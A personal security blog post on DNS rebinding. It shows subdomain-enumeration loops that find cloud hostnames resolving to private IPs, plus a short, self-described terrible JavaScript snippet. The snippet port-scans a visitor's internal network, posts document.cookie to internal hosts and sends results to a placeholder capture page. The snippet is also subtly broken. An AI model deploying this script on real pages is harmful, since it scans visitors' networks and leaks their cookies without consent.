DNS-Rebinding and such

     What started off as an interesting read on how DNS rebinding attacks work, and how they're leveraged to scan internal networks. The high level gist of the scenario is that if you have multiple A records, or the ability to rapidly change A records during someone's visit to a page, you can cause them to run push requests to other pages. This may include things like scanning a web-page visitor's local network, or replaying known addresses (maybe due to public dns resolving internal addresses) there is potential for attempting things like xss to steal credentials. Since it's the same domain being resolved, the browser often won't have any issue attempting requests.

    Now, what this turned into was my general thought of "I've seen attacks before where people used webrtc, wasm, flash, vbs, etc... to port scan a network, I wonder if you could just use javascript targeting subdomains of other websites that have sub-domains pointing to private ips. This would be especially effective if any of those websites used things like cookies that are listed as *.domain instead of sub.domain.  There is actually a substantial amount of these out there. You can find such things by looking up passive dns resolutions that resolve to internal ip addresses (such as this). But what I've found is that many cloud providers do this as part of their automation to use public dns to resolve local domains for all clients. So I started on a hunt for these:

subfinder -rl 50 -all -silent -d lb.appdomain.cloud > /tmp/subdomains; for i in `cat /tmp/subdomains`; do dig +all $i |grep -i "IN A\|DIG "| grep -B1 -iE "(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.1[6789]\.\.[0-9]{1,3}\.[0-9]{1,3}|172\.2[0-9]\.|172\.3[01]\.\.[0-9]{1,3}\.[0-9]{1,3})"; done |grep -i "+all" |awk '{print $7}'

subfinder -rl 50 -all -silent -d us-east-1.amazonaws.com > /tmp/subdomains; for i in `cat /tmp/subdomains`; do dig +all $i |grep -i "IN A\|DIG "| grep -B1 -iE "(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.1[6789]\.\.[0-9]{1,3}\.[0-9]{1,3}|172\.2[0-9]\.|172\.3[01]\.\.[0-9]{1,3}\.[0-9]{1,3})"; done |grep -i "+all" |awk '{print $7}'

subfinder -rl 50 -all -silent -d awsstatic.com > /tmp/subdomains; for i in `cat /tmp/subdomains`; do dig +all $i |grep -i "IN A\|DIG "| grep -B1 -iE "(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.1[6789]\.\.[0-9]{1,3}\.[0-9]{1,3}|172\.2[0-9]\.|172\.3[01]\.\.[0-9]{1,3}\.[0-9]{1,3})"; done |grep -i "+all" |awk '{print $7}'

Most of these that are private ips, are basically just cnames to something else that points to a firewall or loadbalancer internal ip. But after collecting a number of these I set out to write some terrible javascript that would make calls to these private ips just to do some basic port scanning. Here is a defanged example, with "WHATEVER" being a different page to capture results, and the listing list being where i'd put those domains:

const listing=[];listing.forEach((domain) => {Array.from(["80","8080","443","8443","10000","22","2222","88","5789"]).forEach(port => { try{fetch('http://'+domain+':'+port,{method: 'POST', mode: 'no-cors', body: document.cookie,}).then(data => {obj = data;});fetch('WHATEVER',{method: 'POST', mode: 'no-cors', body: obj,});new Promise(r => setTimeout(r, 2000)); } catch(error){} });});

The results were... well, if you don't specify a port range, it almost immediately wastes memory and eventually crashes your web client. Too many domains also takes forever, parallelizing doesn't help because again memory issues. But for a short list of these domains, so probably best for just known ips and those resolutions, you can scan a webpage visitor's internal network pretty easily.

Anyway, that's all the fun for this post, until next time.

Thanks for reading

If you need any IT or CyberSecurity work remotely or within the DFW area, please contact us over at FeemcoTechnologies.

Comments

Post a Comment

Popular Posts

Updates

 Windows 11:  That required upgrade you can't perform     I have a lot of issues with using windows, apple, or red hat, and it's mostly because I grew up believing that people shouldn't have to pay to use a computer they already paid for. One time physical purchase, should be an all inclusive package. Sadly, thats not how the world works these days. Now days, your phone apps update every day, your phone updates every week, your computer updates every tuesday and at random, all of them enforce reboots or risk crashing the respective systems, blah. It's all pretty horrible. Now we have Windows 11 out for a while, with even high-end gaming computers that were purchased just before it's release, unable to run windows 11 on it.     If this was just a "my hardware isn't good enough" for it, I guess I could see that. ya know, service purchase with updates and all this garbage, fine. But in some cases, like mine, I have a windows 10 PC waiting to upgrade becau...
Read more

Weird hunting

Image
Bug hunting, threat hunting... license hunting?      Found myself doing some weird hunting, not finding anything special, but it was fun to keep some skills up. To start with, I was spending some time digging through some github repos using a tool called trufflehog . This is a secrets detection tool thats used specifically to determine if secrets have been leaked in code repos. It's really good for finding leaked passwords, apikeys, session tokens, etc... In my case, I was searching and stumbled across a result I wasn't too sure about. It was a .DS_Store file. These files are often left behind by Apple Mac OS when accessing specific filesystems ( you can find details on why this is a thing with a quick google ).  The main idea however, is that for support of specific systems, mac used a metadata caching mechanism, mostly filenames. Sometimes when finding these files, you can extract data from them in order to identify other files you should try to access. The file th...
Read more

Networking Basics - Pentesting Training part 1

Image
Primer:      I want to make a tutorial that I could show my kid to help them understand hacking, methodology, basics, etc... so this is an introduction post, more will follow, and maybe I can add a video series to go along with this.     The first thing to talk about, is what and why. Technology, while ever changing, can will always fall victim to several problems.  First is the idea that use case when created, won't match use case performed. Such as, when creating a remote for a TV, it may use infrared to point to the TV, and that works fine when one TV is in the same room at a time. When more then this is added, conflicts are caused and the light used for remote is picked up by the infrared sensor on multiple TVs. Change channels on one, both go. Second is that nothing created by man, is or is capable of creating, flawlessness. Business profits drive innovation, but not perfectionism (or the attempt to become close to perfect).     With these is...
Read more